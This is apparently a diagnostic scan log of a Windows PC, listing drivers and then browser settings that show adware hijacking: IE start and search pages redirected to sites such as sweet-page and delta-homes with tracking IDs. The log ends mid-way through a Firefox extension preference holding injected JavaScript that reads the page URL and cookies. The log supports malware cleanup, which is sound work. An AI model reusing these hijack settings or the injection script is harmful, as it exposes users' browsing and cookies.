C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus) DRV:[b]64bit:[/b] - [2013-09-16 12:20:12 | 000,099,288 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\TeeDriverx64.sys -- (MEIx64) DRV:[b]64bit:[/b] - [2013-09-05 16:37:40 | 001,390,904 | ---- | M] (Motorola Solutions, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btmhsf.sys -- (btmhsf) DRV:[b]64bit:[/b] - [2013-09-04 18:03:50 | 003,345,376 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NETwew00.sys -- (NETwNe64) DRV:[b]64bit:[/b] - [2013-09-01 00:11:30 | 012,528,640 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmdag.sys -- (amdkmdag) DRV:[b]64bit:[/b] - [2013-08-31 22:32:34 | 000,618,496 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmpag.sys -- (amdkmdap) DRV:[b]64bit:[/b] - [2013-08-22 15:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv) DRV:[b]64bit:[/b] - [2013-08-22 15:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec) DRV:[b]64bit:[/b] - [2013-08-22 14:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam) DRV:[b]64bit:[/b] - [2013-08-22 14:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex) DRV:[b]64bit:[/b] - [2013-08-22 14:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM) DRV:[b]64bit:[/b] - [2013-08-22 14:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis) DRV:[b]64bit:[/b] - [2013-08-22 14:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32) DRV:[b]64bit:[/b] - [2013-08-22 14:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv) DRV:[b]64bit:[/b] - [2013-08-22 14:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2) DRV:[b]64bit:[/b] - [2013-08-22 14:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS) DRV:[b]64bit:[/b] - [2013-08-22 14:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD) DRV:[b]64bit:[/b] - [2013-08-22 14:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3) DRV:[b]64bit:[/b] - [2013-08-22 14:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX) DRV:[b]64bit:[/b] - [2013-08-22 14:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv) DRV:[b]64bit:[/b] - [2013-08-22 14:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs) DRV:[b]64bit:[/b] - [2013-08-22 14:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware) DRV:[b]64bit:[/b] - [2013-08-22 14:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata) DRV:[b]64bit:[/b] - [2013-08-22 14:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv) DRV:[b]64bit:[/b] - [2013-08-22 14:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass) DRV:[b]64bit:[/b] - [2013-08-22 14:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata) DRV:[b]64bit:[/b] - [2013-08-22 14:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID) DRV:[b]64bit:[/b] - [2013-08-22 14:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor) DRV:[b]64bit:[/b] - [2013-08-22 14:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor) DRV:[b]64bit:[/b] - [2013-08-22 14:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci) DRV:[b]64bit:[/b] - [2013-08-22 14:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx) DRV:[b]64bit:[/b] - [2013-08-22 14:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx) DRV:[b]64bit:[/b] - [2013-08-22 14:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI) DRV:[b]64bit:[/b] - [2013-08-22 14:37:27 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci) DRV:[b]64bit:[/b] - [2013-08-22 14:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr) DRV:[b]64bit:[/b] - [2013-08-22 13:39:58 | 000,020,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WSDPrint.sys -- (WSDPrintDevice) DRV:[b]64bit:[/b] - [2013-08-22 13:39:54 | 000,076,800 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache) DRV:[b]64bit:[/b] - [2013-08-22 13:39:50 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WSDScan.sys -- (WSDScan) DRV:[b]64bit:[/b] - [2013-08-22 13:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay) DRV:[b]64bit:[/b] - [2013-08-22 13:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo) DRV:[b]64bit:[/b] - [2013-08-22 13:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf) DRV:[b]64bit:[/b] - [2013-08-22 13:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime) DRV:[b]64bit:[/b] - [2013-08-22 13:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr) DRV:[b]64bit:[/b] - [2013-08-22 13:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg) DRV:[b]64bit:[/b] - [2013-08-22 13:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic) DRV:[b]64bit:[/b] - [2013-08-22 13:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter) DRV:[b]64bit:[/b] - [2013-08-22 13:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig) DRV:[b]64bit:[/b] - [2013-08-22 13:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid) DRV:[b]64bit:[/b] - [2013-08-22 13:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd) DRV:[b]64bit:[/b] - [2013-08-22 13:37:46 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD) DRV:[b]64bit:[/b] - [2013-08-22 13:37:42 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum) DRV:[b]64bit:[/b] - [2013-08-22 13:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt) DRV:[b]64bit:[/b] - [2013-08-22 13:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c) DRV:[b]64bit:[/b] - [2013-08-22 13:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc) DRV:[b]64bit:[/b] - [2013-08-22 13:36:43 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc) DRV:[b]64bit:[/b] - [2013-08-22 13:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus) DRV:[b]64bit:[/b] - [2013-08-22 13:36:17 | 000,124,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform) DRV:[b]64bit:[/b] - [2013-08-22 13:36:07 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp) DRV:[b]64bit:[/b] - [2013-08-22 13:35:42 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu) DRV:[b]64bit:[/b] - [2013-08-22 10:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM) DRV:[b]64bit:[/b] - [2013-08-13 01:25:46 | 000,017,624 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2) DRV:[b]64bit:[/b] - [2013-08-10 02:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV) DRV:[b]64bit:[/b] - [2013-08-07 14:23:46 | 000,644,968 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA) DRV:[b]64bit:[/b] - [2013-07-30 20:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO) DRV:[b]64bit:[/b] - [2013-07-26 15:07:30 | 000,827,096 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt630x64.sys -- (RTL8168) DRV:[b]64bit:[/b] - [2013-07-25 21:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C) DRV:[b]64bit:[/b] - [2013-07-22 18:56:48 | 000,140,600 | ---- | M] (Motorola Solutions, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btmaux.sys -- (btmaux) DRV:[b]64bit:[/b] - [2013-06-19 12:36:47 | 000,177,312 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SYMEVENT64x86.SYS -- (SymEvent) DRV:[b]64bit:[/b] - [2013-05-23 07:25:28 | 001,139,800 | ---- | M] (Symantec Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\NISx64\1405000.01C\symefa64.sys -- (SymEFA) DRV:[b]64bit:[/b] - [2013-05-21 09:14:00 | 000,165,344 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AmpPal.sys -- (AMPPAL) DRV:[b]64bit:[/b] - [2013-05-21 07:02:00 | 000,493,656 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NISx64\1405000.01C\symds64.sys -- (SymDS) DRV:[b]64bit:[/b] - [2013-05-16 07:02:14 | 000,796,760 | ---- | M] (Symantec Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1405000.01C\srtsp64.sys -- (SRTSP) DRV:[b]64bit:[/b] - [2013-04-25 02:43:56 | 000,433,752 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\NISx64\1405000.01C\symnets.sys -- (SymNetS) DRV:[b]64bit:[/b] - [2013-04-23 13:24:26 | 000,069,088 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iBtFltCoex.sys -- (iBtFltCoex) DRV:[b]64bit:[/b] - [2013-04-16 04:41:14 | 000,169,048 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NISx64\1405000.01C\ccsetx64.sys -- (ccSet_NIS) DRV:[b]64bit:[/b] - [2013-03-05 03:40:08 | 000,224,416 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NISx64\1405000.01C\ironx64.sys -- (SymIRON) DRV:[b]64bit:[/b] - [2013-03-05 03:21:35 | 000,036,952 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NISx64\1405000.01C\srtspx64.sys -- (SRTSPX) DRV:[b]64bit:[/b] - [2012-10-08 22:03:18 | 000,325,488 | ---- | M] (ELAN Microelectronics Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ETD.sys -- (ETD) DRV:[b]64bit:[/b] - [2012-07-27 14:00:03 | 000,023,408 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\RadioHIDMini.sys -- (RadioHIDMini) DRV:[b]64bit:[/b] - [2012-06-20 23:27:30 | 000,023,448 | R--- | M] (Symantec Corporation) [Kernel | Disabled | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1405000.01C\symelam.sys -- (SymELAM) DRV:[b]64bit:[/b] - [2012-05-26 02:56:14 | 000,168,608 | R--- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\NARAx64\0401000.00E\ccSetx64.sys -- (ccSet_NARA) DRV:[b]64bit:[/b] - [2009-07-31 03:40:32 | 000,025,600 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\XENfiltv.sys -- (XENfiltv) DRV - [2013-05-31 18:58:18 | 001,393,240 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\BASHDefs\20130531.001\BHDrvx64.sys -- (BHDrvx64) DRV - [2013-05-22 12:15:48 | 002,098,776 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20130605.002\ex64.sys -- (NAVEX15) DRV - [2013-05-22 12:15:47 | 000,126,040 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20130605.002\eng64.sys -- (NAVENG) DRV - [2013-04-06 19:06:35 | 000,484,512 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys -- (eeCtrl) DRV - [2013-04-06 19:06:35 | 000,138,912 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- (EraserUtilRebootDrv) DRV - [2013-04-05 17:07:10 | 000,513,184 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\IPSDefs\20130604.001\IDSviA64.sys -- (IDSVia64) DRV - [2012-12-12 18:40:32 | 000,015,144 | ---- | M] (Windows (R) 2003 DDK 3790 provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\rtport.sys -- (rtport) [color=#E56717]========== Standard Registry (SafeList) ==========[/color] [color=#E56717]========== Internet Explorer ==========[/color] IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-page.com/?type=hp&ts=1394637952&from=tugs&uid=ST1000LM024XHN-M101MBB_S2RQJ9ACA05693 IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-page.com/web/?type=ds&ts=1394637952&from=tugs&uid=ST1000LM024XHN-M101MBB_S2RQJ9ACA05693&q={searchTerms} IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-page.com/web/?type=ds&ts=1394637952&from=tugs&uid=ST1000LM024XHN-M101MBB_S2RQJ9ACA05693&q={searchTerms} IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://search.gboxapp.com/ IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86} IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{11900973-0897-3A41-300B-2AB6974903BD}: "URL" = http://dts.search-results.com/sr?src=ieb&gct=ds&appid=1175&systemid=1&apn_uid=2285406564584649&apn_dtid=IME001&o=APN10653&apn_ptnrs=AGE&q={searchTerms} IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.sweet-page.com/web/?type=ds&ts=1394637952&from=tugs&uid=ST1000LM024XHN-M101MBB_S2RQJ9ACA05693&q={searchTerms} IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2001}: "URL" = http://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=coolmsd&cd=2XzuyEtN2Y1L1Qzu0C0A0FyBtAtAtDzzyBzztC0CyE0E0EyEtN0D0Tzu0CyDtAzztN1L2XzutBtFtBtFyEtFyBtAtCtN1L1Czu1R1F1F1I1H1B1Q&cr=1521658066&ir= IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{A9A9ECA3-DEA4-482B-AD43-46692B227404}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASMJS IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.delta-homes.com/web/?type=ds&ts=1402605191&from=wpm0612&uid=ST1000LM024XHN-M101MBB_S2RQJ9ACA05693&q={searchTerms} IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.delta-homes.com/web/?type=ds&ts=1402605191&from=wpm0612&uid=ST1000LM024XHN-M101MBB_S2RQJ9ACA05693&q={searchTerms} IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://search.gboxapp.com/ IE - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86} IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC IE - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://search.delta-homes.com/web/?type=ds&ts=1402605191&from=wpm0612&uid=ST1000LM024XHN-M101MBB_S2RQJ9ACA05693&q={searchTerms} IE - HKLM\..\SearchScopes\{457C042F-E631-FDD4-EDD8-6E4C4EB5538E}: "URL" = http://dts.search-results.com/sr?src=ieb&gct=ds&appid=1175&systemid=1&apn_uid=2285406564584649&apn_dtid=IME001&o=APN10653&apn_ptnrs=AGE&q={searchTerms} IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2001}: "URL" = http://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=coolmsd&cd=2XzuyEtN2Y1L1Qzu0C0A0FyBtAtAtDzzyBzztC0CyE0E0EyEtN0D0Tzu0CyDtAzztN1L2XzutBtFtBtFyEtFyBtAtCtN1L1Czu1R1F1F1I1H1B1Q&cr=1521658066&ir= IE - HKLM\..\SearchScopes\{A9A9ECA3-DEA4-482B-AD43-46692B227404}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASMJS IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-21-4279228227-215742994-1318027649-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-page.com/?type=hp&ts=1394637952&from=tugs&uid=ST1000LM024XHN-M101MBB_S2RQJ9ACA05693 IE - HKU\S-1-5-21-4279228227-215742994-1318027649-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.delta-homes.com/web/?type=ds&ts=1402605191&from=wpm0612&uid=ST1000LM024XHN-M101MBB_S2RQJ9ACA05693&q={searchTerms} IE - HKU\S-1-5-21-4279228227-215742994-1318027649-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.delta-homes.com/web/?type=ds&ts=1402605191&from=wpm0612&uid=ST1000LM024XHN-M101MBB_S2RQJ9ACA05693&q={searchTerms} IE - HKU\S-1-5-21-4279228227-215742994-1318027649-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://search.gboxapp.com/ IE - HKU\S-1-5-21-4279228227-215742994-1318027649-1001\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86} IE - HKU\S-1-5-21-4279228227-215742994-1318027649-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02 IE - HKU\S-1-5-21-4279228227-215742994-1318027649-1001\..\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}: "URL" = http://search.babylon.com/?q={searchTerms}&babsrc=SP_ss_din2g&mntrId=F83DCAF73308781C&affID=119357&tsp=4922 IE - HKU\S-1-5-21-4279228227-215742994-1318027649-1001\..\SearchScopes\{11900973-0897-3A41-300B-2AB6974903BD}: "URL" = http://dts.search-results.com/sr?src=ieb&gct=ds&appid=1175&systemid=1&apn_uid=2285406564584649&apn_dtid=IME001&o=APN10653&apn_ptnrs=AGE&q={searchTerms} IE - HKU\S-1-5-21-4279228227-215742994-1318027649-1001\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://search.delta-homes.com/web/?type=ds&ts=1402605191&from=wpm0612&uid=ST1000LM024XHN-M101MBB_S2RQJ9ACA05693&q={searchTerms} IE - HKU\S-1-5-21-4279228227-215742994-1318027649-1001\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2001}: "URL" = http://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=coolmsd&cd=2XzuyEtN2Y1L1Qzu0C0A0FyBtAtAtDzzyBzztC0CyE0E0EyEtN0D0Tzu0CyDtAzztN1L2XzutBtFtBtFyEtFyBtAtCtN1L1Czu1R1F1F1I1H1B1Q&cr=1521658066&ir= IE - HKU\S-1-5-21-4279228227-215742994-1318027649-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 [color=#E56717]========== FireFox ==========[/color] FF - prefs.js..browser.search.order.1: "delta-homes" FF - prefs.js..browser.search.useDBForOrder: true FF - prefs.js..browser.startup.homepage: "http://search.gboxapp.com/" FF - prefs.js..extensions.D80.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"onduit\")>-1||url.match(/bing.com[^p]+pc=.+/)||url.match(/search.yahoo.com.+hspart=.+/)||url.indexOf(\"search.imesh\")>-1||url.indexOf(\"search.searchcore\")>-1||url.indexOf(\"searchnu.com\")>-1||url.indexOf(\"searchqu.com\")>-1||url.indexOf(\"shareazaweb\")>-1||url.indexOf(\"searchgby.com\")>-1||url.indexOf(\"mysearchresults.com\")>-1||url.indexOf(\"searchya.com\")>-1||url.indexOf(\"searchgol.com\")>-1||url.indexOf(\"trovi.com\")>-1||url.indexOf(\"search.ask\")>-1||url.indexOf(\"mywebsearch.com\")>-1||url.indexOf(\"search-results.com\")>-1||url.indexOf(\"mysearch.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?